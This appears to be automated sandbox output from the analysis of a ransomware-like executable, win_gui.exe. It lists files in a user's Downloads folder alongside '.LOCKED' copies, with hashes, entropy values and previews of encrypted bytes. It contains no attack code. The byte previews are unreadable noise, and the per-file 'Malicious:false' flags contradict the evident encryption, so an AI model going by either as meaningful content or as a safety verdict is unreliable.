                                Preview:.mt.".....ruYt..%=.d... 9...:...Y...Au).6s...W...@...zDl...Z......Mr.}JO.y.h.<c _....%-\".....pF..p.H...7.^...Na......eF...Ce.iE..6.@s.......=..a6.....9.;.B}..<..#.J.I#h.Yu..1...9.B.t.~9g...W...._.<u...H.1..^]....k .[.b{....."'+_x.1...\..]..0.....Z....&......I.k`0."...Ju....p.?.h..G $.a3...W.Gk.3.W....C~z...l.o..N...Y.<...vlZV......"Iyhz{f..wY..4......*.W.a.R.Q..p0...zT..U....Z.S...q.R.gvGc.H.@l.}cIi-..*........*tR=..2>....9vd.S.@<T....B.o.....a..A..M...&9h..;.gjK...SyK4J@H.-Z.].Z<.bi}.%$7.B...W.;.k.5..h?...v6...S8..{....uw.4..I..P".K..^J..b...p.....C<j..j.9.sy-9,whCM.@..N..uW.F...z...|.GO.P.......hF..(-+..#,......J.R.E...7Dg....k7..KN...I.o.bO.6.a.....["r....@B.Y7u.m..%..d.........o.CPy..L.z......*r..=w..#t..;..g..T.55L.`q=)JC.....d.#.r..........n(..3@..b...BS..k@T.D.......{.....2b%...0.*.R...}r%...(.N.".^.2.S..iM+$F...X..I..):..1...ye5.m.......tI..Z.r~. J.w+@...7.....Bt-y...J...)...W@k..5.8......61F.....m..Z^.#.THu.5P...h...i..&J...#

                                C:\Users\user\Downloads\DUUDTUBZFW.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.872245743467843
                                Encrypted:false
                                SSDEEP:48:9qaXzvCJol+KBWjVEgi/WyYu+MAVMJg6TF:9/XblbWJEBevuAVOF
                                MD5:0D49BBDCE0CE90BF82F9112D03BAD1B3
                                SHA1:9809B268AC9B67B1A7F685212947F08E18B51BE0
                                SHA-256:BDD73A8A1A47D3DAED1AA419D6836FE90CDEB09BDC6CFA3265B87199709E5302
                                SHA-512:477CF9F07D9BD8621572CB8AAD4284413174429D67FBC7D239347AA2B8BD4D73ACCC588BB8C035700F64C1909605BCE2AC98447C5456CAAC6F7736DD7C7E5B31
                                Malicious:false
                                Preview:.mt.".....ruYt..%=.d... 9...:...Y...Au).6s...W...@...zDl...Z......Mr.}JO.y.h.<c _....%-\".....pF..p.H...7.^...Na......eF...Ce.iE..6.@s.......=..a6.....9.;.B}..<..#.J.I#h.Yu..1...9.B.t.~9g...W...._.<u...H.1..^]....k .[.b{....."'+_x.1...\..]..0.....Z....&......I.k`0."...Ju....p.?.h..G $.a3...W.Gk.3.W....C~z...l.o..N...Y.<...vlZV......"Iyhz{f..wY..4......*.W.a.R.Q..p0...zT..U....Z.S...q.R.gvGc.H.@l.}cIi-..*........*tR=..2>....9vd.S.@<T....B.o.....a..A..M...&9h..;.gjK...SyK4J@H.-Z.].Z<.bi}.%$7.B...W.;.k.5..h?...v6...S8..{....uw.4..I..P".K..^J..b...p.....C<j..j.9.sy-9,whCM.@..N..uW.F...z...|.GO.P.......hF..(-+..#,......J.R.E...7Dg....k7..KN...I.o.bO.6.a.....["r....@B.Y7u.m..%..d.........o.CPy..L.z......*r..=w..#t..;..g..T.55L.`q=)JC.....d.#.r..........n(..3@..b...BS..k@T.D.......{.....2b%...0.*.R...}r%...(.N.".^.2.S..iM+$F...X..I..):..1...ye5.m.......tI..Z.r~. J.w+@...7.....Bt-y...J...)...W@k..5.8......61F.....m..Z^.#.THu.5P...h...i..&J...#

                                C:\Users\user\Downloads\DUUDTUBZFW.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885051206584612
                                Encrypted:false
                                SSDEEP:24:kdmn9S9FQr6ykqT9SembJRBQpzifTqLz/wpDyYPGTNj0hOHAVMJg6WXs9XZ:VOQryR8zif23/WyYu+MAVMJg6Tz
                                MD5:729941D05D533829D513D26C8D800471
                                SHA1:80A1FF3B5A7617A0ED23E85DAB8B3FE07DFD7C68
                                SHA-256:4BB667C67DA4C5DB02506633A0FA3AA88ADC198E9F8BFA688B5562055988C3B3
                                SHA-512:AE5532695078678BA062698995E4ADF0EBC5B109F7044348349B8934ABB1A8EEFE27C829C91CA5B3658BB49380D59ECABA29633790F54A0D1D985A35A0B8FDBB
                                Malicious:false
                                Preview:..+6.I.9}.i.M.)K..|sRt.^O8.L..b2.....*9..A.].........).B..=&.v..aM.......'...e.M/..h....yoR..2....%.....k.v..!.#.7.XEC8..a'$y.h...g..^....?..z..W.j....\..$.......z.].X......&.9..m`.K......t..j... .l.1G..&.....:...U.(.:.H.......B.*. T...w.(b#...|......\.B....b......R..5.g?{b.'...y...e...0...(H.7.....,LT.U.~..;o".....kH..g...D..L*............t6...^..8..Agg6......c1<$i...1.O>..........q{.sj.36...DP.3.DqY.8.s...........n...{L....+rP..n^....@.lH;xs..|........^=...N.Mz...3.Y.~....vi..........EX..'...Enn.$&...{.M....G......D....n..E....Hs.d..#.A<y<0.F.'...;E....e...?.;zd...7.AW.I6.>..!N7.X.,&"..A.?.#.9..>...*...M.f<.V.M..by....T...;...Z.t..5H.r.xe[.7X&Ix....%.....(8l..vQ....y...z..$.0<&Pp.8.Y.m.n...'dh[...<k.]T..+%...'..m.....0..t2..Lu\3.LOt..Jk.W...:..JE.|....[......."4o..C....7@2^.W ....>{9..<...k.@Ch...k.Fd....p<...t?.T../..qc.\..&.....fc...-.^<...V.;@T.nQ.m.E=....T.....N'........i....;.....t.<..C..x?v]}.$!..WXli^.3.B.AjWoT.Tt\WC.O.

                                C:\Users\user\Downloads\DUUDTUBZFW.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885051206584612
                                Encrypted:false
                                SSDEEP:24:kdmn9S9FQr6ykqT9SembJRBQpzifTqLz/wpDyYPGTNj0hOHAVMJg6WXs9XZ:VOQryR8zif23/WyYu+MAVMJg6Tz
                                MD5:729941D05D533829D513D26C8D800471
                                SHA1:80A1FF3B5A7617A0ED23E85DAB8B3FE07DFD7C68
                                SHA-256:4BB667C67DA4C5DB02506633A0FA3AA88ADC198E9F8BFA688B5562055988C3B3
                                SHA-512:AE5532695078678BA062698995E4ADF0EBC5B109F7044348349B8934ABB1A8EEFE27C829C91CA5B3658BB49380D59ECABA29633790F54A0D1D985A35A0B8FDBB
                                Malicious:false
                                Preview:..+6.I.9}.i.M.)K..|sRt.^O8.L..b2.....*9..A.].........).B..=&.v..aM.......'...e.M/..h....yoR..2....%.....k.v..!.#.7.XEC8..a'$y.h...g..^....?..z..W.j....\..$.......z.].X......&.9..m`.K......t..j... .l.1G..&.....:...U.(.:.H.......B.*. T...w.(b#...|......\.B....b......R..5.g?{b.'...y...e...0...(H.7.....,LT.U.~..;o".....kH..g...D..L*............t6...^..8..Agg6......c1<$i...1.O>..........q{.sj.36...DP.3.DqY.8.s...........n...{L....+rP..n^....@.lH;xs..|........^=...N.Mz...3.Y.~....vi..........EX..'...Enn.$&...{.M....G......D....n..E....Hs.d..#.A<y<0.F.'...;E....e...?.;zd...7.AW.I6.>..!N7.X.,&"..A.?.#.9..>...*...M.f<.V.M..by....T...;...Z.t..5H.r.xe[.7X&Ix....%.....(8l..vQ....y...z..$.0<&Pp.8.Y.m.n...'dh[...<k.]T..+%...'..m.....0..t2..Lu\3.LOt..Jk.W...:..JE.|....[......."4o..C....7@2^.W ....>{9..<...k.@Ch...k.Fd....p<...t?.T../..qc.\..&.....fc...-.^<...V.;@T.nQ.m.E=....T.....N'........i....;.....t.<..C..x?v]}.$!..WXli^.3.B.AjWoT.Tt\WC.O.

                                C:\Users\user\Downloads\EFOYFBOLXA.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8848491916223855
                                Encrypted:false
                                SSDEEP:48:lQTAPGhsVKCok5tPz8f1l1Jaqn2XyL/WyYu+MAVMJg6TeD:Z+ddyqJa3XyLevuAVO2
                                MD5:304C501D15834F77038ED86A8DC2EBB5
                                SHA1:B03A155717ECA9DD8ACCC3ED46B97F9A2E48BED8
                                SHA-256:DA604A8932F65663D3F7B9350FDE5F8A870EFC291C67C5DA7C01D60CD58AD017
                                SHA-512:2EC568F2C2E8AF8596351165DF8A7390B97081426E400473C81A56B4D1EA359890D4F7BA5340E0FC7A0A4E9276A42560A7FD8FA835656A662508697A17A54EE0
                                Malicious:false
                                Preview:.;.2.tR.:...r.....WFm+.pf.w.`8..0...t.\`.U".L[.@...v.T@..U.v%XF....?...s.....+95.Q.w..=.V9/$.du.. q....H=..]..=4..(.......&...?i..f..cL..........{...F.Z.....N@......r. +*.x.....V.....7.....G....'..dF.....$$..+;..4bRD..dX~P!. l...7....\...d....W....~&!hXsZ.._....-..tO....?.....C..p.Jh.1.,.C...'...HW......%.....d.<N.@.XZ.Y..Y..P...U....{..m}+9.f.H...0V3.1..6..p.*?IN.>.U.....C."P"........+...q.S.r~.i.xb..I.[.h^..W.|..BZyT...Q.C...x.G..f...<$3.S).c..."k.j.Y.uz.,...b*..zvN..:g.Q.....m.....Hjk...~..r._..I..N..v....$....,..b..V...i....w..V."<.x..8I.K..`.A...c........h..,:9.!y.1.>'Q."AD......r....l.1.B..~O.....&.....X]N.....d4..\i....9...b.a.....PnR.U.D.x6..W.}..p4..,5.E..{..h.-{.'.'...I+...O=.F?..........8.>...&.......4.......^fm.....A!U.SQ..P....}.&..1/.......!......p+'....0..M.^4...+..5.n.M..e.6A..F........j.I*.qM.t..%r.a=...L.7l...?c$u...K.(.A|.mmK4....u].?...eJ<=JR.iz.....m.3..Y....6X#...h....|_.<X[..e..M!.O.....(..R#.Ml..:.$.0)Tu.....X..%h.3B;.=.I

                                C:\Users\user\Downloads\EFOYFBOLXA.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8848491916223855
                                Encrypted:false
                                SSDEEP:48:lQTAPGhsVKCok5tPz8f1l1Jaqn2XyL/WyYu+MAVMJg6TeD:Z+ddyqJa3XyLevuAVO2
                                MD5:304C501D15834F77038ED86A8DC2EBB5
                                SHA1:B03A155717ECA9DD8ACCC3ED46B97F9A2E48BED8
                                SHA-256:DA604A8932F65663D3F7B9350FDE5F8A870EFC291C67C5DA7C01D60CD58AD017
                                SHA-512:2EC568F2C2E8AF8596351165DF8A7390B97081426E400473C81A56B4D1EA359890D4F7BA5340E0FC7A0A4E9276A42560A7FD8FA835656A662508697A17A54EE0
                                Malicious:false
                                Preview:.;.2.tR.:...r.....WFm+.pf.w.`8..0...t.\`.U".L[.@...v.T@..U.v%XF....?...s.....+95.Q.w..=.V9/$.du.. q....H=..]..=4..(.......&...?i..f..cL..........{...F.Z.....N@......r. +*.x.....V.....7.....G....'..dF.....$$..+;..4bRD..dX~P!. l...7....\...d....W....~&!hXsZ.._....-..tO....?.....C..p.Jh.1.,.C...'...HW......%.....d.<N.@.XZ.Y..Y..P...U....{..m}+9.f.H...0V3.1..6..p.*?IN.>.U.....C."P"........+...q.S.r~.i.xb..I.[.h^..W.|..BZyT...Q.C...x.G..f...<$3.S).c..."k.j.Y.uz.,...b*..zvN..:g.Q.....m.....Hjk...~..r._..I..N..v....$....,..b..V...i....w..V."<.x..8I.K..`.A...c........h..,:9.!y.1.>'Q."AD......r....l.1.B..~O.....&.....X]N.....d4..\i....9...b.a.....PnR.U.D.x6..W.}..p4..,5.E..{..h.-{.'.'...I+...O=.F?..........8.>...&.......4.......^fm.....A!U.SQ..P....}.&..1/.......!......p+'....0..M.^4...+..5.n.M..e.6A..F........j.I*.qM.t..%r.a=...L.7l...?c$u...K.(.A|.mmK4....u].?...eJ<=JR.iz.....m.3..Y....6X#...h....|_.<X[..e..M!.O.....(..R#.Ml..:.$.0)Tu.....X..%h.3B;.=.I

                                C:\Users\user\Downloads\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868133533340762
                                Encrypted:false
                                SSDEEP:48:sUlrvgbN/wN5f2TFOBbU/WyYu+MAVMJg6TSp:T9oif2TFOBbUevuAVOY
                                MD5:11EE959BB409C1726B596C9D142CE633
                                SHA1:495D567F1BFE7D17BA38DB4679B3C53CE7A39B31
                                SHA-256:6B40D44A33212A8737B41A1F2AFB96C92A3118377A2D17C590E94E4A0571E080
                                SHA-512:38E3F64D28F6B314479F017796BDF1A9F65510D989AF72A782AA3B5C18CA91BC88E3F33A4F735BA6C971EF1675071727AB709F3F6CDEA0051AE6E03667CF044C
                                Malicious:false
                                Preview:._..;.s.w..z.../...x.y...........e....b...]E...@.<h...............o.%.-....mO,...f..t9M.... w....C3bTz.5#x.]_U....k......f..P....gz.......*..].._R...H..s....`P.>......vUX.y.`............%..9{...k.}H.%$....Cydd.....P.......0..R/._..{&r....G..p....B4...{#........f.[J.|....*.(.I..?.E.2.m..V..,].....[....(....".P.>.L.......|..a. 2pN...Ug..W..A.Tp,..x.F...[........)..H.../.QA.);.....X..C......;..P..J~.g.U.%SB.1...a......e.'+.!lUF?.9...Q....zuw..D8.a...Q..c../._.s/........_..........*)\..z.S_.pv.^b.X%_....&.C..#_....)D.r..Z..IkhAG[.>.Bzw.f<7v.H.....Km^.o.h.. .F...hP..H.."..z./..]H.S8.F.n...I..8.(b....^..I.....#...@..ZC~.bTmhk_2Q..l.24.Bw..w.1nE...5%uN.l.hG}uS.....m.YP...;...A...r.r..!d....A..3.....t....yS.\...053R.$M..(7.~..._......U0.....Y.`$....j.b8..1..<..D%.1.e.F...`:g...1...aSj.,.R.a....M...i.f.{OR.......2&.....xS..d.'w...A,.RK%I..U.:../....N..1hL.DD.!.....T.|f..{PvF.:A......F.....[*f.g.aZq4STA...S.FK.b;)d2./...1.D..].r....j.g.

                                C:\Users\user\Downloads\EFOYFBOLXA.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868133533340762
                                Encrypted:false
                                SSDEEP:48:sUlrvgbN/wN5f2TFOBbU/WyYu+MAVMJg6TSp:T9oif2TFOBbUevuAVOY
                                MD5:11EE959BB409C1726B596C9D142CE633
                                SHA1:495D567F1BFE7D17BA38DB4679B3C53CE7A39B31
                                SHA-256:6B40D44A33212A8737B41A1F2AFB96C92A3118377A2D17C590E94E4A0571E080
                                SHA-512:38E3F64D28F6B314479F017796BDF1A9F65510D989AF72A782AA3B5C18CA91BC88E3F33A4F735BA6C971EF1675071727AB709F3F6CDEA0051AE6E03667CF044C
                                Malicious:false
                                Preview:._..;.s.w..z.../...x.y...........e....b...]E...@.<h...............o.%.-....mO,...f..t9M.... w....C3bTz.5#x.]_U....k......f..P....gz.......*..].._R...H..s....`P.>......vUX.y.`............%..9{...k.}H.%$....Cydd.....P.......0..R/._..{&r....G..p....B4...{#........f.[J.|....*.(.I..?.E.2.m..V..,].....[....(....".P.>.L.......|..a. 2pN...Ug..W..A.Tp,..x.F...[........)..H.../.QA.);.....X..C......;..P..J~.g.U.%SB.1...a......e.'+.!lUF?.9...Q....zuw..D8.a...Q..c../._.s/........_..........*)\..z.S_.pv.^b.X%_....&.C..#_....)D.r..Z..IkhAG[.>.Bzw.f<7v.H.....Km^.o.h.. .F...hP..H.."..z./..]H.S8.F.n...I..8.(b....^..I.....#...@..ZC~.bTmhk_2Q..l.24.Bw..w.1nE...5%uN.l.hG}uS.....m.YP...;...A...r.r..!d....A..3.....t....yS.\...053R.$M..(7.~..._......U0.....Y.`$....j.b8..1..<..D%.1.e.F...`:g...1...aSj.,.R.a....M...i.f.{OR.......2&.....xS..d.'w...A,.RK%I..U.:../....N..1hL.DD.!.....T.|f..{PvF.:A......F.....[*f.g.aZq4STA...S.FK.b;)d2./...1.D..].r....j.g.

                                C:\Users\user\Downloads\EIVQSAOTAQ.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.880126065721922
                                Encrypted:false
                                SSDEEP:24:oWZtcJI1V4wCzlKilqLFsLxzylxCgOlwEQxz/wpDyYPGTNj0hOHAVMJg6WXs90k:oWTX4dlzLxzOOnK/WyYu+MAVMJg6T+k
                                MD5:D92C30EF42450740D7DEDEE736BCC69B
                                SHA1:95DFD199C46464A00B59CB4EEE6688597BCA269C
                                SHA-256:AFAD661D6B9C7AADE2E46B601527A2ED1A5FC16CD57200B62760854C4723F46E
                                SHA-512:E97F0D8D55997D4CFBC4FABA8467209C7DC90B1B4615DED48B61375DB587E44CA7C31CE15D654B479C7F877BC6C6E812B4EFE59EDB475D36152230D6E5BBF4AA
                                Malicious:false
                                Preview:C..^..``.Qr...d.=.F.^d.C..uh..H..^%Q.4.........{A...uLD...R.SL.t...U..<.....{....o...c.....'._..=.fO4.4.....rH...N.v.FdB...........P.ze.*ST../...bb......A*.;.(.Q.........K...f...9......}..I.o..B.Y0..e.]wN8...q7..2....T...5.?$ (."....3.".8.N....i....)J..([...Y..2......V`.]D..N.]N.......;...B5.]....7...o....>.....@f:...>...c^.......-...q...(..."?I*.Z.w.|...E....e.gl>...W.e....+.dv.......k..t..v...[..I0....H..q....X.}.q..N.#.7.._.4....`.pA.0......xY.7.i|.......|..>....R..X.........X.h4h.'+..m.,.h.[~v@Ip[<..Q......Q0.......b.d..r.).p$..C..@J..FM;y@. ....=......`l.|G..~....H?C......;.#P6.v..N.8..[.u.2..g\...E..W..%.Z<!J}l"......n.ty....d.t._:..Y..r.(.....r....=...=z.iE.X..1..mg.L...d`.R.. E..l.....7CeE.D...6..[@.YU.'...:Q"w..3&...1...."O..U..LCiP.....o[...|(....HR..w2f.uY@.G.v..7.5.p............ls...^..@..>-...$...z%.2. u{.Fx?.;a.ov.]b.)..UE!C*..0[.I...aG.l..!|w...$gC.hf..L<.>v;.aQ(..K....ZF^.%2e......Q.~|.j...}..x1.9.I-.W66.a.Yp.2:=y....Lq....

                                C:\Users\user\Downloads\EIVQSAOTAQ.pdf.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.880126065721922
                                Encrypted:false
                                SSDEEP:24:oWZtcJI1V4wCzlKilqLFsLxzylxCgOlwEQxz/wpDyYPGTNj0hOHAVMJg6WXs90k:oWTX4dlzLxzOOnK/WyYu+MAVMJg6T+k
                                MD5:D92C30EF42450740D7DEDEE736BCC69B
                                SHA1:95DFD199C46464A00B59CB4EEE6688597BCA269C
                                SHA-256:AFAD661D6B9C7AADE2E46B601527A2ED1A5FC16CD57200B62760854C4723F46E
                                SHA-512:E97F0D8D55997D4CFBC4FABA8467209C7DC90B1B4615DED48B61375DB587E44CA7C31CE15D654B479C7F877BC6C6E812B4EFE59EDB475D36152230D6E5BBF4AA
                                Malicious:false
                                Preview:C..^..``.Qr...d.=.F.^d.C..uh..H..^%Q.4.........{A...uLD...R.SL.t...U..<.....{....o...c.....'._..=.fO4.4.....rH...N.v.FdB...........P.ze.*ST../...bb......A*.;.(.Q.........K...f...9......}..I.o..B.Y0..e.]wN8...q7..2....T...5.?$ (."....3.".8.N....i....)J..([...Y..2......V`.]D..N.]N.......;...B5.]....7...o....>.....@f:...>...c^.......-...q...(..."?I*.Z.w.|...E....e.gl>...W.e....+.dv.......k..t..v...[..I0....H..q....X.}.q..N.#.7.._.4....`.pA.0......xY.7.i|.......|..>....R..X.........X.h4h.'+..m.,.h.[~v@Ip[<..Q......Q0.......b.d..r.).p$..C..@J..FM;y@. ....=......`l.|G..~....H?C......;.#P6.v..N.8..[.u.2..g\...E..W..%.Z<!J}l"......n.ty....d.t._:..Y..r.(.....r....=...=z.iE.X..1..mg.L...d`.R.. E..l.....7CeE.D...6..[@.YU.'...:Q"w..3&...1...."O..U..LCiP.....o[...|(....HR..w2f.uY@.G.v..7.5.p............ls...^..@..>-...$...z%.2. u{.Fx?.;a.ov.]b.)..UE!C*..0[.I...aG.l..!|w...$gC.hf..L<.>v;.aQ(..K....ZF^.%2e......Q.~|.j...}..x1.9.I-.W66.a.Yp.2:=y....Lq....

                                C:\Users\user\Downloads\EWZCVGNOWT.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.864025982549886
                                Encrypted:false
                                SSDEEP:48:d38+aaT9Ba5jm1omS4GXhP/WyYu+MAVMJg6Tgc:tZaA9M4SPevuAVO7
                                MD5:5467BB9E8B709CC1F6C24C41FCB2464B
                                SHA1:8192B8DDC5E688CC4F59F1C0793D1AC2EE56E4E6
                                SHA-256:C5D73E43E19F871CCA63CB96B9BDFC3EF11662EEAD0794A475FFD92470FF6D63
                                SHA-512:D15385749B049888733DA4629D61A1F7DBAD097F8BAEEABA92106E3698D6610FA0AF706856DA3F32A07FCF1F08EE5149EBA03912DD5444C7AF2874AB6E22BD6A
                                Malicious:false
                                Preview:c.^.:.\...b...DA78jxR.~?...k....S...A..z.x.e{N\`*.......<m.+.)&D2..8;...hW....}*.R........q..{...9P....i..}T{..".vN].q7..rO.y...3.......~...e.6.'.....g.Q.q....=...7...aVB7.i...J|....\o/`j..@.....Uut...J..v..-..M.B.\J.F.bvX^C.#4$.8..4&g=\...@............4.).`..e'(.`...8...ET..c..m.y.y.O....KB..8.s.;Ic.d:.o6...e.5.....|:.x....!...B....-.....he$.w$.N.._..5 ....d/9..L.rc.|.ct5{.-....'.....SDb..o..^....=..1.R.....#.s%..P.r.........:.7.#..hc..m.....L3...K......"..(....t.jFn....R...Q...?......w........_...`.|.5........8p.7....4.G.V.....6.e.j.6..?....m..=.......$(i..c..a...HJp..z..:...A....U.......Rd......<...l}"..._:+V.4...Y.....E.......o..4..hKD.~...P.... t..3.e.\i. ..yn\..g....|.......D..r-.F!...Ar..R...p.[0_X.c.%~(.YU.f..._.x<...$_HU.1.8...^.E.yq.c.._<..~G.39Zl!~..J..._........b.}1..Z..;xO..o..`9.\..,X.0...JO.^<...i..(..>.U>..?.WJ.a..0$...@..4.b(.t.u)p.ab4...`7..<.z[Z.....Q.p./..Z&.).c. .K....z....B.YpU ...O.2.'=.8.7..h.Oj3F..k.v>.j.N.~.wzV.K..c3(

                                C:\Users\user\Downloads\EWZCVGNOWT.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.864025982549886
                                Encrypted:false
                                SSDEEP:48:d38+aaT9Ba5jm1omS4GXhP/WyYu+MAVMJg6Tgc:tZaA9M4SPevuAVO7
                                MD5:5467BB9E8B709CC1F6C24C41FCB2464B
                                SHA1:8192B8DDC5E688CC4F59F1C0793D1AC2EE56E4E6
                                SHA-256:C5D73E43E19F871CCA63CB96B9BDFC3EF11662EEAD0794A475FFD92470FF6D63
                                SHA-512:D15385749B049888733DA4629D61A1F7DBAD097F8BAEEABA92106E3698D6610FA0AF706856DA3F32A07FCF1F08EE5149EBA03912DD5444C7AF2874AB6E22BD6A
                                Malicious:false
                                Preview:c.^.:.\...b...DA78jxR.~?...k....S...A..z.x.e{N\`*.......<m.+.)&D2..8;...hW....}*.R........q..{...9P....i..}T{..".vN].q7..rO.y...3.......~...e.6.'.....g.Q.q....=...7...aVB7.i...J|....\o/`j..@.....Uut...J..v..-..M.B.\J.F.bvX^C.#4$.8..4&g=\...@............4.).`..e'(.`...8...ET..c..m.y.y.O....KB..8.s.;Ic.d:.o6...e.5.....|:.x....!...B....-.....he$.w$.N.._..5 ....d/9..L.rc.|.ct5{.-....'.....SDb..o..^....=..1.R.....#.s%..P.r.........:.7.#..hc..m.....L3...K......"..(....t.jFn....R...Q...?......w........_...`.|.5........8p.7....4.G.V.....6.e.j.6..?....m..=.......$(i..c..a...HJp..z..:...A....U.......Rd......<...l}"..._:+V.4...Y.....E.......o..4..hKD.~...P.... t..3.e.\i. ..yn\..g....|.......D..r-.F!...Ar..R...p.[0_X.c.%~(.YU.f..._.x<...$_HU.1.8...^.E.yq.c.._<..~G.39Zl!~..J..._........b.}1..Z..;xO..o..`9.\..,X.0...JO.^<...i..(..>.U>..?.WJ.a..0$...@..4.b(.t.u)p.ab4...`7..<.z[Z.....Q.p./..Z&.).c. .K....z....B.YpU ...O.2.'=.8.7..h.Oj3F..k.v>.j.N.~.wzV.K..c3(

                                C:\Users\user\Downloads\GLTYDMDUST.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885076544907748
                                Encrypted:false
                                SSDEEP:48:pz0wVpVbQkSj9egWVNXRkj/WyYu+MAVMJg6Tl:pAwV0kY9X3evuAVOl
                                MD5:28F90DADB30533701168912032FC2335
                                SHA1:DADC79957EECC62B77A882671FD7023094821FBC
                                SHA-256:CA8B43ED9EBC9E2B9025A0F587E99D90619AC24D134109793B1C7401337F3C8A
                                SHA-512:7432D0EC55F4054DF75DF9A7FE48399BCF43FBC566DAF85E0ABFCC1E52D64EC737EDF03F420CD25D0E99B285C8A2584A4A711F1E52611B681876C1EA38818ECC
                                Malicious:false
                                Preview:..M..U...N0.uEZ.<...(.R..%...w)..'?.w...N../~....z...`.].*.....K.i.M<p....8...m..fyh..z.(..z...t.Z.R...X.....e|.......g.f.yLu(..0....U..e.>.C....1PV.X.(........h.....8X.Q()s4H(..MS.m...Ha.$..-!..jU7:....D.O.,....K>.+..'*H......-..N.]i......*.S...Z.;.........O..0M..._..N.......K"."U...?......m`k4.3.^.~..=...q..n.1P.6I=a.3=?.\i"F....A..S..6..n....\.D..{....n...x..G.&.:j..e...X.G..7.l...u..].......=..k..X.....2...H.u......pd9.....%R....J.F@.X...1...+...\|.T.y.7.f..C...<$....!z.ZZ..s..o.....[..S.K...u....?.......a..vJz.?G......j4zq....8.j..c4.....s......_.......$..+.7.\.jE...Kx.a.tu............s..~5.....q+.k....b.T.r.<..8R....}.\...........I=Y.../i..%.....u..t.1_....?'0.R0.s>j......If*.^...h.....].P......F...$0.PAFr..Me/....m!^........J.f(.t.Q~`1...6$...c.`...&4o.Br......*m~....3..P..R...X.>2...un'%...xI2YY".....e.V*Epl.Q>..uqzv+..x].[M..>].r{\.Y|..d..>C.J+... .Ls.......w)...CA........../.7...:..>@..3.i.yn....g.2.......9....U.ci..W.....c1..@

                                C:\Users\user\Downloads\GLTYDMDUST.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.885076544907748
                                Encrypted:false
                                SSDEEP:48:pz0wVpVbQkSj9egWVNXRkj/WyYu+MAVMJg6Tl:pAwV0kY9X3evuAVOl
                                MD5:28F90DADB30533701168912032FC2335
                                SHA1:DADC79957EECC62B77A882671FD7023094821FBC
                                SHA-256:CA8B43ED9EBC9E2B9025A0F587E99D90619AC24D134109793B1C7401337F3C8A
                                SHA-512:7432D0EC55F4054DF75DF9A7FE48399BCF43FBC566DAF85E0ABFCC1E52D64EC737EDF03F420CD25D0E99B285C8A2584A4A711F1E52611B681876C1EA38818ECC
                                Malicious:false
                                Preview:..M..U...N0.uEZ.<...(.R..%...w)..'?.w...N../~....z...`.].*.....K.i.M<p....8...m..fyh..z.(..z...t.Z.R...X.....e|.......g.f.yLu(..0....U..e.>.C....1PV.X.(........h.....8X.Q()s4H(..MS.m...Ha.$..-!..jU7:....D.O.,....K>.+..'*H......-..N.]i......*.S...Z.;.........O..0M..._..N.......K"."U...?......m`k4.3.^.~..=...q..n.1P.6I=a.3=?.\i"F....A..S..6..n....\.D..{....n...x..G.&.:j..e...X.G..7.l...u..].......=..k..X.....2...H.u......pd9.....%R....J.F@.X...1...+...\|.T.y.7.f..C...<$....!z.ZZ..s..o.....[..S.K...u....?.......a..vJz.?G......j4zq....8.j..c4.....s......_.......$..+.7.\.jE...Kx.a.tu............s..~5.....q+.k....b.T.r.<..8R....}.\...........I=Y.../i..%.....u..t.1_....?'0.R0.s>j......If*.^...h.....].P......F...$0.PAFr..Me/....m!^........J.f(.t.Q~`1...6$...c.`...&4o.Br......*m~....3..P..R...X.>2...un'%...xI2YY".....e.V*Epl.Q>..uqzv+..x].[M..>].r{\.Y|..d..>C.J+... .Ls.......w)...CA........../.7...:..>@..3.i.yn....g.2.......9....U.ci..W.....c1..@

                                C:\Users\user\Downloads\GRXZDKKVDB.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.861195862831501
                                Encrypted:false
                                SSDEEP:48:nF8mkvWTu1hdbD4AC7Vhq7qEYzjmb7/WyYu+MAVMJg6T2w:ervTv/AbqGrWb7evuAVO2w
                                MD5:C61BA0EFD4FAB252ECF1F28691B4F0D5
